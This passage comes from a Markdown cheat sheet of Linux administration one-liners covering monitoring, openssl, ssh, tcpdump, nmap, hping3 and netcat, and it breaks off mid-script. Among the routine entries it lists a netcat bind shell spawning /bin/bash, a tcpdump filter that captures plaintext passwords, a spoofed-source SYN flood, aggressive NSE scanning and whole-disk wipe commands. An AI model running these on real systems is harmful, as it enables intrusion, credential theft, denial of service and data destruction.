##### Tool: [vmstat](https://en.wikipedia.org/wiki/Vmstat)
###### Show current system utilization (fields in kilobytes)
```bash
vmstat 2 20 -t -w
```
* `2` - number of times with a defined time interval (delay)
* `20` - each execution of the command (count)
* `-t` - show timestamp
* `-w` - wide output
* `-S M` - output of the fields in megabytes instead of kilobytes
###### Show current system utilization will get refreshed every 5 seconds
```bash
vmstat 5 -w
```
###### Display report a summary of disk operations
```bash
vmstat -D
```
###### Display report of event counters and memory stats
```bash
vmstat -s
```
###### Display report about kernel objects stored in slab layer cache
```bash
vmstat -m
```
##### Tool: [iostat](https://en.wikipedia.org/wiki/Iostat)
###### Show information about the CPU usage, and I/O statistics about all the partitions
```bash
iostat 2 10 -t -m
```
* `2` - number of times with a defined time interval (delay)
* `10` - each execution of the command (count)
* `-t` - show timestamp
* `-m` - fields in megabytes (`-k` - in kilobytes, default)
###### Show information only about the CPU utilization
```bash
iostat 2 10 -t -m -c
```
###### Show information only about the disk utilization
```bash
iostat 2 10 -t -m -d
```
###### Show information only about the LVM utilization
```bash
iostat -N
```
___
##### Tool: [strace](https://en.wikipedia.org/wiki/Strace)
###### Track with child processes
```bash
# 1)
strace -f -p $(pidof glusterfsd)
# 2)
strace -f $(pidof php-fpm | sed 's/\([0-9]*\)/\-p \1/g')
```
###### Track process with 30 seconds limit
```bash
timeout 30 strace $(< /var/run/zabbix/zabbix_agentd.pid)
```
###### Track processes and redirect output to a file
```bash
ps auxw | grep '[a]pache' | awk '{print " -p " $2}' | \
xargs strace -o /tmp/strace-apache-proc.out
```
###### Track with print time spent in each syscall and limit length of print strings
```bash
ps auxw | grep '[i]init_policy' | awk '{print " -p " $2}' | \
xargs strace -f -e trace=network -T -s 10000
```
###### Track the open request of a network port
```bash
strace -f -e trace=bind nc -l 80
```
###### Track the open request of a network port (show TCP/UDP)
```bash
strace -f -e trace=network nc -lu 80
```
___
##### Tool: [kill](https://en.wikipedia.org/wiki/Kill_(command))
###### Kill a process running on port
```bash
kill -9 $(lsof -i :<port> | awk '{l=$2} END {print l}')
```
___
##### Tool: [diff](https://en.wikipedia.org/wiki/Diff)
###### Compare two directory trees
```bash
diff <(cd directory1 && find | sort) <(cd directory2 && find | sort)
```
###### Compare output of two commands
```bash
diff <(cat /etc/passwd) <(cut -f2 /etc/passwd)
```
___
##### Tool: [vimdiff](http://vimdoc.sourceforge.net/htmldoc/diff.html)
###### Highlight the exact differences, based on characters and words
```bash
vimdiff file1 file2
```
###### Compare two JSON files
```bash
vimdiff <(jq -S . A.json) <(jq -S . B.json)
```
###### Compare Hex dump
```bash
d(){ vimdiff <(f $1) <(f $2);};f(){ hexdump -C $1|cut -d' ' -f3-|tr -s ' ';}; d ~/bin1 ~/bin2
```
###### diffchar
Save [diffchar](https://raw.githubusercontent.com/vim-scripts/diffchar.vim/master/plugin/diffchar.vim) @ `~/.vim/plugins`
Click `F7` to switch between diff modes
Usefull `vimdiff` commands:
* `qa` to exit all windows
* `:vertical resize 70` to resize window
* set window width `Ctrl+W [N columns]+(Shift+)<\>`
___
##### Tool: [tail](https://en.wikipedia.org/wiki/Tail_(Unix))
###### Annotate tail -f with timestamps
```bash
tail -f file | while read ; do echo "$(date +%T.%N) $REPLY" ; done
```
###### Analyse an Apache access log for the most common IP addresses
```bash
tail -10000 access_log | awk '{print $1}' | sort | uniq -c | sort -n | tail
```
###### Analyse web server log and show only 5xx http codes
```bash
tail -n 100 -f /path/to/logfile | grep "HTTP/[1-2].[0-1]\" [5]"
```
___
##### Tool: [tar](https://en.wikipedia.org/wiki/Tar_(computing))
###### System backup with exclude specific directories
```bash
cd /
tar -czvpf /mnt/system$(date +%d%m%Y%s).tgz --directory=/ \
--exclude=proc/* --exclude=sys/* --exclude=dev/* --exclude=mnt/* .
```
###### System backup with exclude specific directories (pigz)
```bash
cd /
tar cvpf /backup/snapshot-$(date +%d%m%Y%s).tgz --directory=/ \
--exclude=proc/* --exclude=sys/* --exclude=dev/* \
--exclude=mnt/* --exclude=tmp/* --use-compress-program=pigz .
```
___
##### Tool: [dump](https://en.wikipedia.org/wiki/Dump_(program))
###### System backup to file
```bash
dump -y -u -f /backup/system$(date +%d%m%Y%s).lzo /
```
###### Restore system from lzo file
```bash
cd /
restore -rf /backup/system$(date +%d%m%Y%s).lzo
```
___
##### Tool: [cpulimit](http://cpulimit.sourceforge.net/)
###### Limit the cpu usage of a process
```bash
cpulimit -p pid -l 50
```
___
##### Tool: [pwdx](https://www.cyberciti.biz/faq/unix-linux-pwdx-command-examples-usage-syntax/)
###### Show current working directory of a process
```bash
pwdx <pid>
```
___
##### Tool: [taskset](https://www.cyberciti.biz/faq/taskset-cpu-affinity-command/)
###### Start a command on only one CPU core
```bash
taskset -c 0 <command>
```
___
##### Tool: [tr](https://en.wikipedia.org/wiki/Tr_(Unix))
###### Show directories in the PATH, one per line
```bash
tr : '\n' <<<$PATH
```
___
##### Tool: [chmod](https://en.wikipedia.org/wiki/Chmod)
###### Remove executable bit from all files in the current directory
```bash
chmod -R -x+X *
```
###### Restore permission for /bin/chmod
```bash
# 1:
cp /bin/ls chmod.01
cp /bin/chmod chmod.01
./chmod.01 700 file
# 2:
/bin/busybox chmod 0700 /bin/chmod
# 3:
setfacl --set u::rwx,g::---,o::--- /bin/chmod
```
___
##### Tool: [who](https://en.wikipedia.org/wiki/Who_(Unix))
###### Find last reboot time
```bash
who -b
```
###### Detect a user sudo-su'd into the current shell
```bash
[[ $(who -m | awk '{ print $1 }') == $(whoami) ]] || echo "You are su-ed to $(whoami)"
```
___
##### Tool: [last](https://www.howtoforge.com/linux-last-command/)
###### Was the last reboot a panic?
```bash
(last -x -f $(ls -1t /var/log/wtmp* | head -2 | tail -1); last -x -f /var/log/wtmp) | \
grep -A1 reboot | head -2 | grep -q shutdown && echo "Expected reboot" || echo "Panic reboot"
```
___
##### Tool: [screen](https://en.wikipedia.org/wiki/GNU_Screen)
###### Start screen in detached mode
```bash
screen -d -m <command>
```
###### Attach to an existing screen session
```bash
screen -r -d <pid>
```
___
##### Tool: [script](https://en.wikipedia.org/wiki/Script_(Unix))
###### Record and replay terminal session
```bash
### Record session
# 1)
script -t 2>~/session.time -a ~/session.log
# 2)
script --timing=session.time session.log
### Replay session
scriptreplay --timing=session.time session.log
```
___
##### Tool: [du](https://en.wikipedia.org/wiki/GNU_Screen)
###### Show 20 biggest directories with 'K M G'
```bash
du | \
sort -r -n | \
awk '{split("K M G",v); s=1; while($1>1024){$1/=1024; s++} print int($1)" "v[s]"\t"$2}' | \
head -n 20
```
___
##### Tool: [inotifywait](https://en.wikipedia.org/wiki/GNU_Screen)
###### Init tool everytime a file in a directory is modified
```bash
while true ; do inotifywait -r -e MODIFY dir/ && ls dir/ ; done;
```
___
##### Tool: [openssl](https://www.openssl.org/)
###### Testing connection to the remote host
```bash
echo | openssl s_client -connect google.com:443 -showcerts
```
###### Testing connection to the remote host (debug mode)
```bash
echo | openssl s_client -connect google.com:443 -showcerts -tlsextdebug -status
```
###### Testing connection to the remote host (with SNI support)
```bash
echo | openssl s_client -showcerts -servername google.com -connect google.com:443
```
###### Testing connection to the remote host with specific ssl version
```bash
openssl s_client -tls1_2 -connect google.com:443
```
###### Testing connection to the remote host with specific ssl cipher
```bash
openssl s_client -cipher 'AES128-SHA' -connect google.com:443
```
###### Verify 0-RTT
```bash
_host="example.com"
cat > req.in << __EOF__
HEAD / HTTP/1.1
Host: $_host
Connection: close
__EOF__
openssl s_client -connect ${_host}:443 -tls1_3 -sess_out session.pem -ign_eof < req.in
openssl s_client -connect ${_host}:443 -tls1_3 -sess_in session.pem -early_data req.in
```
###### Generate private key without passphrase
```bash
# _len: 2048, 4096
( _fd="private.key" ; _len="4096" ; \
openssl genrsa -out ${_fd} ${_len} )
```
###### Generate private key with passphrase
```bash
# _ciph: des3, aes128, aes256
# _len: 2048, 4096
( _ciph="aes128" ; _fd="private.key" ; _len="4096" ; \
openssl genrsa -${_ciph} -out ${_fd} ${_len} )
```
###### Remove passphrase from private key
```bash
( _fd="private.key" ; _fd_unp="private_unp.key" ; \
openssl rsa -in ${_fd} -out ${_fd_unp} )
```
###### Encrypt existing private key with a passphrase
```bash
# _ciph: des3, aes128, aes256
( _ciph="aes128" ; _fd="private.key" ; _fd_pass="private_pass.key" ; \
openssl rsa -${_ciph} -in ${_fd} -out ${_fd_pass}
```
###### Check private key
```bash
( _fd="private.key" ; \
openssl rsa -check -in ${_fd} )
```
###### Get public key from private key
```bash
( _fd="private.key" ; _fd_pub="public.key" ; \
openssl rsa -pubout -in ${_fd} -out ${_fd_pub} )
```
###### Generate private key and CSR
```bash
( _fd="private.key" ; _fd_csr="request.csr" ; _len="4096" ; \
openssl req -out ${_fd_csr} -new -newkey rsa:${_len} -nodes -keyout ${_fd} )
```
###### Generate CSR
```bash
( _fd="private.key" ; _fd_csr="request.csr" ; \
openssl req -out ${_fd_csr} -new -key ${_fd} )
```
###### Generate CSR (metadata from existing certificate)
> Where `private.key` is the existing private key. As you can see you do not generate this CSR from your certificate (public key). Also you do not generate the "same" CSR, just a new one to request a new certificate.
```bash
( _fd="private.key" ; _fd_csr="request.csr" ; _fd_crt="cert.crt" ; \
openssl x509 -x509toreq -in ${_fd_crt} -out ${_fd_csr} -signkey ${_fd} )
```
###### Generate CSR with -config param
```bash
( _fd="private.key" ; _fd_csr="request.csr" ; \
openssl req -new -sha256 -key ${_fd} -out ${_fd_csr} \
-config <(
cat << __EOF__
[req]
default_bits = 2048
default_md = sha256
prompt = no
distinguished_name = dn
req_extensions = req_ext
[ dn ]
C = "<two-letter ISO abbreviation for your country>"
ST = "<state or province where your organisation is legally located>"
L = "<city where your organisation is legally located>"
O = "<legal name of your organisation>"
OU = "<section of the organisation>"
CN = "<fully qualified domain name>"
[ req_ext ]
subjectAltName = @alt_names
[ alt_names ]
DNS.1 = <fully qualified domain name>
DNS.2 = <next domain>
DNS.3 = <next domain>
__EOF__
))
```
Other values in `[ dn ]`:
```
countryName = "DE" # C=
stateOrProvinceName = "Hessen" # ST=
localityName = "Keller" # L=
postalCode = "424242" # L/postalcode=
postalAddress = "Keller" # L/postaladdress=
streetAddress = "Crater 1621" # L/street=
organizationName = "apfelboymschule" # O=
organizationalUnitName = "IT Department" # OU=
commonName = "example.com" # CN=
emailAddress = "webmaster@example.com" # CN/emailAddress=
```
Example of `oids` (you'll probably also have to make OpenSSL know about the new fields required for EV by adding the following under `[new_oids]`):
```
[req]
...
oid_section = new_oids
[ new_oids ]
postalCode = 2.5.4.17
streetAddress = 2.5.4.9
```
For more information please look at these great explanations:
- [RFC 5280](https://tools.ietf.org/html/rfc5280)
- [How to create multidomain certificates using config files](https://apfelboymchen.net/gnu/notes/openssl%20multidomain%20with%20config%20files.html)
- [Generate a multi domains certificate using config files](https://gist.github.com/romainnorberg/464758a6620228b977212a3cf20c3e08)
- [Your OpenSSL CSR command is out of date](https://expeditedsecurity.com/blog/openssl-csr-command/)
- [OpenSSL example configuration file](https://www.tbs-certificats.com/openssl-dem-server-cert.cnf)
###### List available EC curves
```bash
openssl ecparam -list_curves
```
###### Generate ECDSA private key
```bash
# _curve: prime256v1, secp521r1, secp384r1
( _fd="private.key" ; _curve="prime256v1" ; \
openssl ecparam -out ${_fd} -name ${_curve} -genkey )
# _curve: X25519
( _fd="private.key" ; _curve="x25519" ; \
openssl genpkey -algorithm ${_curve} -out ${_fd} )
```
###### Print ECDSA private and public keys
```bash
( _fd="private.key" ; \
openssl ec -in ${_fd} -noout -text )
# For x25519 only extracting public key
( _fd="private.key" ; _fd_pub="public.key" ; \
openssl pkey -in ${_fd} -pubout -out ${_fd_pub} )
```
###### Generate private key with CSR (ECC)
```bash
# _curve: prime256v1, secp521r1, secp384r1
( _fd="domain.com.key" ; _fd_csr="domain.com.csr" ; _curve="prime256v1" ; \
openssl ecparam -out ${_fd} -name ${_curve} -genkey ; \
openssl req -new -key ${_fd} -out ${_fd_csr} -sha256 )
```
###### Generate self-signed certificate
```bash
# _len: 2048, 4096
( _fd="domain.key" ; _fd_out="domain.crt" ; _len="4096" ; _days="365" ; \
openssl req -newkey rsa:${_len} -nodes \
-keyout ${_fd} -x509 -days ${_days} -out ${_fd_out} )
```
###### Generate self-signed certificate from existing private key
```bash
# _len: 2048, 4096
( _fd="domain.key" ; _fd_out="domain.crt" ; _days="365" ; \
openssl req -key ${_fd} -nodes \
-x509 -days ${_days} -out ${_fd_out} )
```
###### Generate self-signed certificate from existing private key and csr
```bash
# _len: 2048, 4096
( _fd="domain.key" ; _fd_csr="domain.csr" ; _fd_out="domain.crt" ; _days="365" ; \
openssl x509 -signkey ${_fd} -nodes \
-in ${_fd_csr} -req -days ${_days} -out ${_fd_out} )
```
###### Generate DH public parameters
```bash
( _dh_size="2048" ; \
openssl dhparam -out /etc/nginx/ssl/dhparam_${_dh_size}.pem "$_dh_size" )
```
###### Display DH public parameters
```bash
openssl pkeyparam -in dhparam.pem -text
```
###### Extract private key from pfx
```bash
( _fd_pfx="cert.pfx" ; _fd_key="key.pem" ; \
openssl pkcs12 -in ${_fd_pfx} -nocerts -nodes -out ${_fd_key} )
```
###### Extract private key and certs from pfx
```bash
( _fd_pfx="cert.pfx" ; _fd_pem="key_certs.pem" ; \
openssl pkcs12 -in ${_fd_pfx} -nodes -out ${_fd_pem} )
```
###### Convert DER to PEM
```bash
( _fd_der="cert.crt" ; _fd_pem="cert.pem" ; \
openssl x509 -in ${_fd_der} -inform der -outform pem -out ${_fd_pem} )
```
###### Convert PEM to DER
```bash
( _fd_der="cert.crt" ; _fd_pem="cert.pem" ; \
openssl x509 -in ${_fd_pem} -outform der -out ${_fd_der} )
```
###### Verification of the private key
```bash
( _fd="private.key" ; \
openssl rsa -noout -text -in ${_fd} )
```
###### Verification of the public key
```bash
# 1)
( _fd="public.key" ; \
openssl pkey -noout -text -pubin -in ${_fd} )
# 2)
( _fd="private.key" ; \
openssl rsa -inform PEM -noout -in ${_fd} &> /dev/null ; \
if [ $? = 0 ] ; then echo -en "OK\n" ; fi )
```
###### Verification of the certificate
```bash
( _fd="certificate.crt" ; # format: pem, cer, crt \
openssl x509 -noout -text -in ${_fd} )
```
###### Verification of the CSR
```bash
( _fd_csr="request.csr" ; \
openssl req -text -noout -in ${_fd_csr} )
```
###### Check whether the private key and the certificate match
```bash
(openssl rsa -noout -modulus -in private.key | openssl md5 ; \
openssl x509 -noout -modulus -in certificate.crt | openssl md5) | uniq
```
###### Check whether the private key and the CSR match
```bash
(openssl rsa -noout -modulus -in private.key | openssl md5 ; \
openssl req -noout -modulus -in request.csr | openssl md5) | uniq
```
___
##### Tool: [secure-delete](https://wiki.archlinux.org/index.php/Securely_wipe_disk)
###### Secure delete with shred
```bash
shred -vfuz -n 10 file
shred --verbose --random-source=/dev/urandom -n 1 /dev/sda
```
###### Secure delete with scrub
```bash
scrub -p dod /dev/sda
scrub -p dod -r file
```
###### Secure delete with badblocks
```bash
badblocks -s -w -t random -v /dev/sda
badblocks -c 10240 -s -w -t random -v /dev/sda
```
###### Secure delete with secure-delete
```bash
srm -vz /tmp/file
sfill -vz /local
sdmem -v
swapoff /dev/sda5 && sswap -vz /dev/sda5
```
___
##### Tool: [dd](https://en.wikipedia.org/wiki/Dd_(Unix))
###### Show dd status every so often
```bash
dd <dd_params> status=progress
watch --interval 5 killall -USR1 dd
```
###### Redirect output to a file with dd
```bash
echo "string" | dd of=filename
```
___
##### Tool: [gpg](https://www.gnupg.org/)
###### Export public key
```bash
gpg --export --armor "<username>" > username.pkey
```
* `--export` - export all keys from all keyrings or specific key
* `-a|--armor` - create ASCII armored output
###### Encrypt file
```bash
gpg -e -r "<username>" dump.sql
```
* `-e|--encrypt` - encrypt data
* `-r|--recipient` - encrypt for specific <username>
###### Decrypt file
```bash
gpg -o dump.sql -d dump.sql.gpg
```
* `-o|--output` - use as output file
* `-d|--decrypt` - decrypt data (default)
###### Search recipient
```bash
gpg --keyserver hkp://keyserver.ubuntu.com --search-keys "<username>"
```
* `--keyserver` - set specific key server
* `--search-keys` - search for keys on a key server
###### List all of the packets in an encrypted file
```bash
gpg --batch --list-packets archive.gpg
gpg2 --batch --list-packets archive.gpg
```
___
##### Tool: [system-other](https://github.com/trimstray/the-book-of-secret-knowledge#tool-system-other)
###### Reboot system from init
```bash
exec /sbin/init 6
```
###### Init system from single user mode
```bash
exec /sbin/init
```
###### Show current working directory of a process
```bash
readlink -f /proc/<PID>/cwd
```
###### Show actual pathname of the executed command
```bash
readlink -f /proc/<PID>/exe
```
##### Tool: [curl](https://curl.haxx.se)
```bash
curl -Iks https://www.google.com
```
* `-I` - show response headers only
* `-k` - insecure connection when using ssl
* `-s` - silent mode (not display body)
```bash
curl -Iks --location -X GET -A "x-agent" https://www.google.com
```
* `--location` - follow redirects
* `-X` - set method
* `-A` - set user-agent
```bash
curl -Iks --location -X GET -A "x-agent" --proxy http://127.0.0.1:16379 https://www.google.com
```
* `--proxy [socks5://|http://]` - set proxy server
```bash
curl -o file.pdf -C - https://example.com/Aiju2goo0Ja2.pdf
```
* `-o` - write output to file
* `-C` - resume the transfer
###### Find your external IP address (external services)
```bash
curl ipinfo.io
curl ipinfo.io/ip
curl icanhazip.com
curl ifconfig.me/ip ; echo
```
###### Repeat URL request
```bash
# URL sequence substitution with a dummy query string:
curl -ks https://example.com/?[1-20]
# With shell 'for' loop:
for i in {1..20} ; do curl -ks https://example.com/ ; done
```
###### Check DNS and HTTP trace with headers for specific domains
```bash
### Set domains and external dns servers.
_domain_list=(google.com) ; _dns_list=("8.8.8.8" "1.1.1.1")
for _domain in "${_domain_list[@]}" ; do
printf '=%.0s' {1..48}
echo
printf "[\\e[1;32m+\\e[m] resolve: %s\\n" "$_domain"
for _dns in "${_dns_list[@]}" ; do
# Resolve domain.
host "${_domain}" "${_dns}"
echo
done
for _proto in http https ; do
printf "[\\e[1;32m+\\e[m] trace + headers: %s://%s\\n" "$_proto" "$_domain"
# Get trace and http headers.
curl -Iks -A "x-agent" --location "${_proto}://${_domain}"
echo
done
done
unset _domain_list _dns_list
```
___
##### Tool: [httpie](https://httpie.org/)
```bash
http -p Hh https://www.google.com
```
* `-p` - print request and response headers
* `H` - request headers
* `B` - request body
* `h` - response headers
* `b` - response body
```bash
http -p Hh https://www.google.com --follow --verify no
```
* `-F, --follow` - follow redirects
* `--verify no` - skip SSL verification
```bash
http -p Hh https://www.google.com --follow --verify no \
--proxy http:http://127.0.0.1:16379
```
* `--proxy [http:]` - set proxy server
##### Tool: [ssh](https://www.openssh.com/)
###### Escape Sequence
```
# Supported escape sequences:
~. - terminate connection (and any multiplexed sessions)
~B - send a BREAK to the remote system
~C - open a command line
~R - Request rekey (SSH protocol 2 only)
~^Z - suspend ssh
~# - list forwarded connections
~& - background ssh (when waiting for connections to terminate)
~? - this message
~~ - send the escape character by typing it twice
```
###### Compare a remote file with a local file
```bash
ssh user@host cat /path/to/remotefile | diff /path/to/localfile -
```
###### SSH connection through host in the middle
```bash
ssh -t reachable_host ssh unreachable_host
```
###### Run command over SSH on remote host
```bash
cat > cmd.txt << __EOF__
cat /etc/hosts
__EOF__
ssh host -l user $(<cmd.txt)
```
###### Get public key from private key
```bash
ssh-keygen -y -f ~/.ssh/id_rsa
```
###### Get all fingerprints
```bash
ssh-keygen -l -f .ssh/known_hosts
```
###### SSH authentication with user password
```bash
ssh -o PreferredAuthentications=password -o PubkeyAuthentication=no user@remote_host
```
###### SSH authentication with publickey
```bash
ssh -o PreferredAuthentications=publickey -o PubkeyAuthentication=yes -i id_rsa user@remote_host
```
###### Simple recording SSH session
```bash
function _ssh_sesslog() {
_sesdir="<path/to/session/logs>"
mkdir -p "${_sesdir}" && \
ssh $@ 2>&1 | tee -a "${_sesdir}/$(date +%Y%m%d).log"
}
# Alias:
alias ssh='_ssh_sesslog'
```
###### Using Keychain for SSH logins
```bash
### Delete all of ssh-agent's keys.
function _scl() {
/usr/bin/keychain --clear
}
### Add key to keychain.
function _scg() {
/usr/bin/keychain /path/to/private-key
source "$HOME/.keychain/$HOSTNAME-sh"
}
```
###### SSH login without processing any login scripts
```bash
ssh -tt user@host bash
```
###### SSH local port forwarding
Example 1:
```bash
# Forwarding our local 2250 port to nmap.org:443 from localhost through localhost
host1> ssh -L 2250:nmap.org:443 localhost
# Connect to the service:
host1> curl -Iks --location -X GET https://localhost:2250
```
Example 2:
```bash
# Forwarding our local 9051 port to db.d.x:5432 from localhost through node.d.y
host1> ssh -nNT -L 9051:db.d.x:5432 node.d.y
# Connect to the service:
host1> psql -U db_user -d db_dev -p 9051 -h localhost
```
* `-n` - redirects stdin from `/dev/null`
* `-N` - do not execute a remote command
* `-T` - disable pseudo-terminal allocation
###### SSH remote port forwarding
```bash
# Forwarding our local 9051 port to db.d.x:5432 from host2 through node.d.y
host1> ssh -nNT -R 9051:db.d.x:5432 node.d.y
# Connect to the service:
host2> psql -U postgres -d postgres -p 8000 -h localhost
```
___
##### Tool: [linux-dev](https://www.tldp.org/LDP/abs/html/devref1.html)
###### Testing remote connection to port
```bash
timeout 1 bash -c "</dev/<proto>/<host>/<port>" >/dev/null 2>&1 ; echo $?
```
* `<proto` - set protocol (tcp/udp)
* `<host>` - set remote host
* `<port>` - set destination port
###### Read and write to TCP or UDP sockets with common bash tools
```bash
exec 5<>/dev/tcp/<host>/<port>; cat <&5 & cat >&5; exec 5>&-
```
___
##### Tool: [tcpdump](http://www.tcpdump.org/)
###### Filter incoming (on interface) traffic (specific <ip:port>)
```bash
tcpdump -ne -i eth0 -Q in host 192.168.252.1 and port 443
```
* `-n` - don't convert addresses (`-nn` will not resolve hostnames or ports)
* `-e` - print the link-level headers
* `-i [iface|any]` - set interface
* `-Q|-D [in|out|inout]` - choose send/receive direction (`-D` - for old tcpdump versions)
* `host [ip|hostname]` - set host, also `[host not]`
* `[and|or]` - set logic
* `port [1-65535]` - set port number, also `[port not]`
###### Filter incoming (on interface) traffic (specific <ip:port>) and write to a file
```bash
tcpdump -ne -i eth0 -Q in host 192.168.252.1 and port 443 -c 5 -w tcpdump.pcap
```
* `-c [num]` - capture only num number of packets
* `-w [filename]` - write packets to file, `-r [filename]` - reading from file
###### Capture all ICMP packets
```bash
tcpdump -nei eth0 icmp
```
###### Check protocol used (TCP or UDP) for service
```bash
tcpdump -nei eth0 tcp port 22 -vv -X | egrep "TCP|UDP"
```
###### Display ASCII text (to parse the output using grep or other)
```bash
tcpdump -i eth0 -A -s0 port 443
```
###### Grab everything between two keywords
```bash
tcpdump -i eth0 port 80 -X | sed -n -e '/username/,/=ldap/ p'
```
###### Grab user and pass ever plain http
```bash
tcpdump -i eth0 port http -l -A | egrep -i \
'pass=|pwd=|log=|login=|user=|username=|pw=|passw=|passwd=|password=|pass:|user:|username:|password:|login:|pass |user ' \
--color=auto --line-buffered -B20
```
###### Extract HTTP User Agent from HTTP request header
```bash
tcpdump -ei eth0 -nn -A -s1500 -l | grep "User-Agent:"
```
###### Capture only HTTP GET and POST packets
```bash
tcpdump -ei eth0 -s 0 -A -vv \
'tcp[((tcp[12:1] & 0xf0) >> 2):4] = 0x47455420' or 'tcp[((tcp[12:1] & 0xf0) >> 2):4] = 0x504f5354'
```
or simply:
```bash
tcpdump -ei eth0 -s 0 -v -n -l | egrep -i "POST /|GET /|Host:"
```
###### Rotate capture files
```bash
tcpdump -ei eth0 -w /tmp/capture-%H.pcap -G 3600 -C 200
```
* `-G <num>` - pcap will be created every `<num>` seconds
* `-C <size>` - close the current pcap and open a new one if is larger than `<size>`
###### Top hosts by packets
```bash
tcpdump -ei enp0s25 -nnn -t -c 200 | cut -f 1,2,3,4 -d '.' | sort | uniq -c | sort -nr | head -n 20
```
###### Excludes any RFC 1918 private address
```bash
tcpdump -nei eth0 'not (src net (10 or 172.16/12 or 192.168/16) and dst net (10 or 172.16/12 or 192.168/16))'
```
___
##### Tool: [tcpick](http://tcpick.sourceforge.net/)
###### Analyse packets in real-time
```bash
while true ; do tcpick -a -C -r dump.pcap ; sleep 2 ; clear ; done
```
___
##### Tool: [ngrep](http://ngrep.sourceforge.net/usage.html)
```bash
ngrep -d eth0 "www.domain.com" port 443
```
* `-d [iface|any]` - set interface
* `[domain]` - set hostname
* `port [1-65535]` - set port number
```bash
ngrep -d eth0 "www.domain.com" src host 10.240.20.2 and port 443
```
* `(host [ip|hostname])` - filter by ip or hostname
* `(port [1-65535])` - filter by port number
```bash
ngrep -d eth0 -qt -O ngrep.pcap "www.domain.com" port 443
```
* `-q` - quiet mode (only payloads)
* `-t` - added timestamps
* `-O [filename]` - save output to file, `-I [filename]` - reading from file
```bash
ngrep -d eth0 -qt 'HTTP' 'tcp'
```
* `HTTP` - show http headers
* `tcp|udp` - set protocol
* `[src|dst] host [ip|hostname]` - set direction for specific node
```bash
ngrep -l -q -d eth0 -i "User-Agent: curl*"
```
* `-l` - stdout line buffered
* `-i` - case-insensitive search
___
##### Tool: [hping3](http://www.hping.org/)
```bash
hping3 -V -p 80 -s 5050 <scan_type> www.google.com
```
* `-V|--verbose` - verbose mode
* `-p|--destport` - set destination port
* `-s|--baseport` - set source port
* `<scan_type>` - set scan type
* `-F|--fin` - set FIN flag, port open if no reply
* `-S|--syn` - set SYN flag
* `-P|--push` - set PUSH flag
* `-A|--ack` - set ACK flag (use when ping is blocked, RST response back if the port is open)
* `-U|--urg` - set URG flag
* `-Y|--ymas` - set Y unused flag (0x80 - nullscan), port open if no reply
* `-M 0 -UPF` - set TCP sequence number and scan type (URG+PUSH+FIN), port open if no reply
```bash
hping3 -V -c 1 -1 -C 8 www.google.com
```
* `-c [num]` - packet count
* `-1` - set ICMP mode
* `-C|--icmptype [icmp-num]` - set icmp type (default icmp-echo = 8)
```bash
hping3 -V -c 1000000 -d 120 -S -w 64 -p 80 --flood --rand-source <remote_host>
```
* `--flood` - sent packets as fast as possible (don't show replies)
* `--rand-source` - random source address mode
* `-d --data` - data size
* `-w|--win` - winsize (default 64)
___
##### Tool: [nmap](https://nmap.org/)
###### Ping scans the network
```bash
nmap -sP 192.168.0.0/24
```
###### Show only open ports
```bash
nmap -F --open 192.168.0.0/24
```
###### Full TCP port scan using with service version detection
```bash
nmap -p 1-65535 -sV -sS -T4 192.168.0.0/24
```
###### Nmap scan and pass output to Nikto
```bash
nmap -p80,443 192.168.0.0/24 -oG - | nikto.pl -h -
```
###### Recon specific ip:service with Nmap NSE scripts stack
```bash
# Set variables:
_hosts="192.168.250.10"
_ports="80,443"
# Set Nmap NSE scripts stack:
_nmap_nse_scripts="+dns-brute,\
+http-auth-finder,\
+http-chrono,\
+http-cookie-flags,\
+http-cors,\
+http-cross-domain-policy,\
+http-csrf,\
+http-dombased-xss,\
+http-enum,\
+http-errors,\
+http-git,\
+http-grep,\
+http-internal-ip-disclosure,\
+http-jsonp-detection,\
+http-malware-host,\
+http-methods,\
+http-passwd,\
+http-phpself-xss,\
+http-php-version,\
+http-robots.txt,\
+http-sitemap-generator,\
+http-shellshock,\
+http-stored-xss,\
+http-title,\
+http-unsafe-output-escaping,\
+http-useragent-tester,\
+http-vhosts,\
+http-waf-detect,\
+http-waf-fingerprint,\
+http-xssed,\
+traceroute-geolocation.nse,\
+ssl-enum-ciphers,\
+whois-domain,\
+whois-ip"
# Set Nmap NSE script params:
_nmap_nse_scripts_args="dns-brute.domain=${_hosts},http-cross-domain-policy.domain-lookup=true,"
_nmap_nse_scripts_args+="http-waf-detect.aggro,http-waf-detect.detectBodyChanges,"
_nmap_nse_scripts_args+="http-waf-fingerprint.intensive=1"
# Perform scan:
nmap --script="$_nmap_nse_scripts" --script-args="$_nmap_nse_scripts_args" -p "$_ports" "$_hosts"
```
___
##### Tool: [netcat](http://netcat.sourceforge.net/)
```bash
nc -kl 5000
```
* `-l` - listen for an incoming connection
* `-k` - listening after client has disconnected
* `>filename.out` - save receive data to file (optional)
```bash
nc 192.168.0.1 5051 < filename.in
```
* `< filename.in` - send data to remote host
```bash
nc -vz 10.240.30.3 5000
```
* `-v` - verbose output
* `-z` - scan for listening daemons
```bash
nc -vzu 10.240.30.3 1-65535
```
* `-u` - scan only udp ports
###### Transfer data file (archive)
```bash
server> nc -l 5000 | tar xzvfp -
client> tar czvfp - /path/to/dir | nc 10.240.30.3 5000
```
###### Launch remote shell
```bash
# 1)
server> nc -l 5000 -e /bin/bash
client> nc 10.240.30.3 5000
# 2)
server> rm -f /tmp/f; mkfifo /tmp/f
server> cat /tmp/f | /bin/bash -i 2>&1 | nc -l 127.0.0.1 5000 > /tmp/f
client> nc 10.240.30.3 5000
```
###### Simple file server
```bash
while true ; do nc -l 5000 | tar -xvf - ; done
```
###### Simple minimal HTTP Server
```bash
while true ; do nc -l -p 1500 -c 'echo -e "HTTP/1.1 200 OK\n\n $(date)"' ; done
```
###### Simple HTTP Server
> Restarts web server after each request - remove `while` condition for only single connection.
```bash
cat > index.html << __EOF__
<!doctype html>
<head>
<meta charset="utf-8">
<meta http-equiv="X-UA-Compatible" content="IE=edge,chrome=1">
<title></title>
<meta name="description" content="">
<meta name="viewport" content="width=device-width, initial-scale=1">
</head>
<body>
<p>
Hello! It's a site.
</p>
</body>
</html>
__EOF__
```
```bash
server> while : ; do \
(echo -ne "HTTP/1.1 200 OK\r\nContent-Length: $(wc -c <index.html)\r\n\r\n" ; cat index.html;) | \
nc -l -p 5000 \
; done
```
* `-p` - port number
###### Simple HTTP Proxy (single connection)
```bash
#!/usr/bin/env bash
if [[ $# != 2 ]] ; then
printf "%s\\n" \
"usage: ./nc-proxy listen-port bk_host:bk_port"
fi
_listen_port="$1"
_bk_host=$(echo "$2" | cut -d ":" -f1)
_bk_port=$(echo "$2" | cut -d ":" -f2)
printf " lport: %s\\nbk_host: %s\\nbk_port: %s\\n\\n" \
